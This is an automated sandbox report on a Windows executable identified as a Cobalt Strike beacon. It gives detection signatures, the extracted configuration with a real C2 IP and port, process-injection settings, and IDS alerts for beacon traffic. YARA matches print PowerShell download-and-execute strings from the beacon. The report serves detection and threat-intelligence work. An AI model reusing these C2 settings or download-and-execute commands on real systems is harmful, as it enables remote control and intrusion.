Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A1E0xfcSNl.exe

Overview

General Information

Sample name:A1E0xfcSNl.exe
renamed because original name is a hash value
Original sample name:f05982b55c7a85b9e71a941fe2295848.exe
Analysis ID:1532360
MD5:f05982b55c7a85b9e71a941fe2295848
SHA1:b0df24778218a422f7a88083c9fb591f0499c36f
SHA256:5462b422de6d759e45cc0269d564acbf0805c4441aba38bd28133c98d1187888
Tags:64exe
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • A1E0xfcSNl.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\A1E0xfcSNl.exe" MD5: F05982B55C7A85B9E71A941FE2295848)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/en_US/all.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
    00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
      • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
      • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
      • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
      • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
      • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
      • 0x32d6a:$a11: Could not open service control manager on %s: %d
      • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
      • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
      • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
      • 0x33255:$a15: could not create remote thread in %d: %d
      • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33203:$a17: could not write to process memory: %d
      • 0x32d9b:$a18: Could not create service %s on %s: %d
      • 0x32e24:$a19: Could not delete service %s on %s: %d
      • 0x32c89:$a20: Could not open process token: %d (%u)
      00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
      • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
      00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
      • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
          • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
          • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
          • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
          • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
          • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
          • 0x32d6a:$a11: Could not open service control manager on %s: %d
          • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
          • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
          • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
          • 0x33255:$a15: could not create remote thread in %d: %d
          • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33203:$a17: could not write to process memory: %d
          • 0x32d9b:$a18: Could not create service %s on %s: %d
          • 0x32e24:$a19: Could not delete service %s on %s: %d
          • 0x32c89:$a20: Could not open process token: %d (%u)
          0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
          • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
          0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpackWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
          • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
          • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
          Click to see the 40 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-13T01:58:04.664697+020020287653Unknown Traffic192.168.2.44973089.197.154.1167810TCP
          2024-10-13T01:58:07.340142+020020287653Unknown Traffic192.168.2.44973289.197.154.1167810TCP
          2024-10-13T01:58:08.669481+020020287653Unknown Traffic192.168.2.44973389.197.154.1167810TCP
          2024-10-13T01:58:09.810635+020020287653Unknown Traffic192.168.2.44973489.197.154.1167810TCP
          2024-10-13T01:58:11.397010+020020287653Unknown Traffic192.168.2.44973589.197.154.1167810TCP
          2024-10-13T01:58:12.724598+020020287653Unknown Traffic192.168.2.44973689.197.154.1167810TCP
          2024-10-13T01:58:13.852517+020020287653Unknown Traffic192.168.2.44973789.197.154.1167810TCP
          2024-10-13T01:58:14.951902+020020287653Unknown Traffic192.168.2.44973889.197.154.1167810TCP
          2024-10-13T01:58:16.066066+020020287653Unknown Traffic192.168.2.44973989.197.154.1167810TCP
          2024-10-13T01:58:17.180337+020020287653Unknown Traffic192.168.2.44974089.197.154.1167810TCP
          2024-10-13T01:58:18.280190+020020287653Unknown Traffic192.168.2.44974189.197.154.1167810TCP
          2024-10-13T01:58:19.431026+020020287653Unknown Traffic192.168.2.44974489.197.154.1167810TCP
          2024-10-13T01:58:20.556703+020020287653Unknown Traffic192.168.2.44974789.197.154.1167810TCP
          2024-10-13T01:58:21.683706+020020287653Unknown Traffic192.168.2.44974989.197.154.1167810TCP
          2024-10-13T01:58:22.797263+020020287653Unknown Traffic192.168.2.44975189.197.154.1167810TCP
          2024-10-13T01:58:23.921059+020020287653Unknown Traffic192.168.2.44975289.197.154.1167810TCP
          2024-10-13T01:58:25.017441+020020287653Unknown Traffic192.168.2.44975389.197.154.1167810TCP
          2024-10-13T01:58:26.119867+020020287653Unknown Traffic192.168.2.44975489.197.154.1167810TCP
          2024-10-13T01:58:27.219444+020020287653Unknown Traffic192.168.2.44975589.197.154.1167810TCP
          2024-10-13T01:58:28.332875+020020287653Unknown Traffic192.168.2.44975689.197.154.1167810TCP
          2024-10-13T01:58:29.444176+020020287653Unknown Traffic192.168.2.44975789.197.154.1167810TCP
          2024-10-13T01:58:30.572168+020020287653Unknown Traffic192.168.2.44975889.197.154.1167810TCP
          2024-10-13T01:58:31.689176+020020287653Unknown Traffic192.168.2.44975989.197.154.1167810TCP
          2024-10-13T01:58:32.799508+020020287653Unknown Traffic192.168.2.44976089.197.154.1167810TCP
          2024-10-13T01:58:33.903933+020020287653Unknown Traffic192.168.2.44976189.197.154.1167810TCP
          2024-10-13T01:58:35.029835+020020287653Unknown Traffic192.168.2.44976289.197.154.1167810TCP
          2024-10-13T01:58:36.122655+020020287653Unknown Traffic192.168.2.44976389.197.154.1167810TCP
          2024-10-13T01:58:37.301019+020020287653Unknown Traffic192.168.2.44976489.197.154.1167810TCP
          2024-10-13T01:58:38.519500+020020287653Unknown Traffic192.168.2.44976589.197.154.1167810TCP
          2024-10-13T01:58:39.625320+020020287653Unknown Traffic192.168.2.44976689.197.154.1167810TCP
          2024-10-13T01:58:40.793850+020020287653Unknown Traffic192.168.2.44976789.197.154.1167810TCP
          2024-10-13T01:58:41.917877+020020287653Unknown Traffic192.168.2.44976889.197.154.1167810TCP
          2024-10-13T01:58:43.054662+020020287653Unknown Traffic192.168.2.44976989.197.154.1167810TCP
          2024-10-13T01:58:44.138422+020020287653Unknown Traffic192.168.2.44977089.197.154.1167810TCP
          2024-10-13T01:58:45.245472+020020287653Unknown Traffic192.168.2.44977189.197.154.1167810TCP
          2024-10-13T01:58:46.339598+020020287653Unknown Traffic192.168.2.44977289.197.154.1167810TCP
          2024-10-13T01:58:47.441530+020020287653Unknown Traffic192.168.2.44977389.197.154.1167810TCP
          2024-10-13T01:58:48.570807+020020287653Unknown Traffic192.168.2.44977489.197.154.1167810TCP
          2024-10-13T01:58:49.678440+020020287653Unknown Traffic192.168.2.44977589.197.154.1167810TCP
          2024-10-13T01:58:50.780258+020020287653Unknown Traffic192.168.2.44977689.197.154.1167810TCP
          2024-10-13T01:58:51.821189+020020287653Unknown Traffic192.168.2.44977789.197.154.1167810TCP
          2024-10-13T01:58:52.918133+020020287653Unknown Traffic192.168.2.44977889.197.154.1167810TCP
          2024-10-13T01:58:54.014418+020020287653Unknown Traffic192.168.2.44977989.197.154.1167810TCP
          2024-10-13T01:58:55.376425+020020287653Unknown Traffic192.168.2.44978089.197.154.1167810TCP
          2024-10-13T01:58:56.481492+020020287653Unknown Traffic192.168.2.44978189.197.154.1167810TCP
          2024-10-13T01:58:57.692454+020020287653Unknown Traffic192.168.2.44978489.197.154.1167810TCP
          2024-10-13T01:58:58.806021+020020287653Unknown Traffic192.168.2.44979089.197.154.1167810TCP
          2024-10-13T01:58:59.903530+020020287653Unknown Traffic192.168.2.44979689.197.154.1167810TCP
          2024-10-13T01:59:00.995787+020020287653Unknown Traffic192.168.2.44980789.197.154.1167810TCP
          2024-10-13T01:59:02.104581+020020287653Unknown Traffic192.168.2.44981389.197.154.1167810TCP
          2024-10-13T01:59:03.200437+020020287653Unknown Traffic192.168.2.44982089.197.154.1167810TCP
          2024-10-13T01:59:06.274200+020020287653Unknown Traffic192.168.2.44983089.197.154.1167810TCP
          2024-10-13T01:59:07.334342+020020287653Unknown Traffic192.168.2.44983689.197.154.1167810TCP
          2024-10-13T01:59:08.458709+020020287653Unknown Traffic192.168.2.44984789.197.154.1167810TCP
          2024-10-13T01:59:09.569367+020020287653Unknown Traffic192.168.2.44985389.197.154.1167810TCP
          2024-10-13T01:59:10.689347+020020287653Unknown Traffic192.168.2.44986489.197.154.1167810TCP
          2024-10-13T01:59:11.821962+020020287653Unknown Traffic192.168.2.44987089.197.154.1167810TCP
          2024-10-13T01:59:12.983260+020020287653Unknown Traffic192.168.2.44988089.197.154.1167810TCP
          2024-10-13T01:59:14.083861+020020287653Unknown Traffic192.168.2.44988789.197.154.1167810TCP
          2024-10-13T01:59:15.199920+020020287653Unknown Traffic192.168.2.44989789.197.154.1167810TCP
          2024-10-13T01:59:16.293948+020020287653Unknown Traffic192.168.2.44990489.197.154.1167810TCP
          2024-10-13T01:59:17.418259+020020287653Unknown Traffic192.168.2.44991089.197.154.1167810TCP
          2024-10-13T01:59:18.534043+020020287653Unknown Traffic192.168.2.44992189.197.154.1167810TCP
          2024-10-13T01:59:19.639635+020020287653Unknown Traffic192.168.2.44992789.197.154.1167810TCP
          2024-10-13T01:59:20.918631+020020287653Unknown Traffic192.168.2.44993889.197.154.1167810TCP
          2024-10-13T01:59:22.011799+020020287653Unknown Traffic192.168.2.44994489.197.154.1167810TCP
          2024-10-13T01:59:23.116129+020020287653Unknown Traffic192.168.2.44995089.197.154.1167810TCP
          2024-10-13T01:59:24.244252+020020287653Unknown Traffic192.168.2.44996189.197.154.1167810TCP
          2024-10-13T01:59:25.365276+020020287653Unknown Traffic192.168.2.44996789.197.154.1167810TCP
          2024-10-13T01:59:26.549497+020020287653Unknown Traffic192.168.2.44997889.197.154.1167810TCP
          2024-10-13T01:59:28.866437+020020287653Unknown Traffic192.168.2.44999089.197.154.1167810TCP
          2024-10-13T01:59:31.157476+020020287653Unknown Traffic192.168.2.45000789.197.154.1167810TCP
          2024-10-13T01:59:33.819291+020020287653Unknown Traffic192.168.2.45002989.197.154.1167810TCP
          2024-10-13T01:59:36.412562+020020287653Unknown Traffic192.168.2.45004689.197.154.1167810TCP
          2024-10-13T01:59:38.766032+020020287653Unknown Traffic192.168.2.45006389.197.154.1167810TCP
          2024-10-13T01:59:41.145936+020020287653Unknown Traffic192.168.2.45008089.197.154.1167810TCP
          2024-10-13T01:59:43.479729+020020287653Unknown Traffic192.168.2.45008789.197.154.1167810TCP
          2024-10-13T01:59:45.760052+020020287653Unknown Traffic192.168.2.45008989.197.154.1167810TCP
          2024-10-13T01:59:48.170632+020020287653Unknown Traffic192.168.2.45009189.197.154.1167810TCP
          2024-10-13T01:59:50.771816+020020287653Unknown Traffic192.168.2.45009389.197.154.1167810TCP
          2024-10-13T01:59:53.200985+020020287653Unknown Traffic192.168.2.45009589.197.154.1167810TCP
          2024-10-13T01:59:55.526273+020020287653Unknown Traffic192.168.2.45009789.197.154.1167810TCP
          2024-10-13T01:59:58.016626+020020287653Unknown Traffic192.168.2.45009989.197.154.1167810TCP
          2024-10-13T02:00:00.393957+020020287653Unknown Traffic192.168.2.45010189.197.154.1167810TCP
          2024-10-13T02:00:02.899997+020020287653Unknown Traffic192.168.2.45010389.197.154.1167810TCP
          2024-10-13T02:00:05.681679+020020287653Unknown Traffic192.168.2.45010589.197.154.1167810TCP
          2024-10-13T02:00:08.156494+020020287653Unknown Traffic192.168.2.45010789.197.154.1167810TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-13T01:58:06.131090+020020356511A Network Trojan was detected89.197.154.1167810192.168.2.449730TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: A1E0xfcSNl.exeAvira: detected
          Found malware configuration
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/en_US/all.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
          Multi AV Scanner detection for domain / URL
          Source: https://89.197.154.116:7810/en_US/all.jsM9Virustotal: Detection: 19%Perma Link
          Source: https://89.197.154.116:7810/dllVirustotal: Detection: 19%Perma Link
          Source: https://89.197.154.116:7810/en_US/all.jshicVirustotal: Detection: 20%Perma Link
          Source: https://89.197.154.116:7810/en_US/all.jsZ0Virustotal: Detection: 20%Perma Link
          Source: https://89.197.154.116:7810/Virustotal: Detection: 6%Perma Link
          Source: https://89.197.154.116:7810/lVirustotal: Detection: 19%Perma Link
          Source: https://89.197.154.116:7810/.netVirustotal: Detection: 20%Perma Link
          Source: https://89.197.154.116:7810//Virustotal: Detection: 6%Perma Link
          Source: https://89.197.154.116:7810/en_US/all.jsomVirustotal: Detection: 19%Perma Link
          Source: https://89.197.154.116:7810/en_US/all.jsVirustotal: Detection: 21%Perma Link
          Source: https://89.197.154.116/Virustotal: Detection: 20%Perma Link
          Source: 89.197.154.116Virustotal: Detection: 22%Perma Link
          Multi AV Scanner detection for submitted file
          Source: A1E0xfcSNl.exeReversingLabs: Detection: 84%
          Source: A1E0xfcSNl.exeVirustotal: Detection: 79%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: A1E0xfcSNl.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007B1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_007B1184
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007E2020 CryptGenRandom,0_2_007E2020
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_007C9220
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_007C1C30
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 4x nop then sub rsp, 28h0_2_00402314

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 89.197.154.116:7810 -> 192.168.2.4:49730
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: 89.197.154.116
          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 89.197.154.116:7810
          Source: Joe Sandbox ViewIP Address: 89.197.154.116 89.197.154.116
          Source: Joe Sandbox ViewIP Address: 89.197.154.116 89.197.154.116
          Source: Joe Sandbox ViewASN Name: VIRTUAL1GB VIRTUAL1GB
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49738 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49730 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49737 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49736 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49739 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49734 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49735 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49732 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49733 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49760 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49766 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49771 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49775 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49777 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49769 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49776 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49770 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49773 -> 89.197.154.116:7810
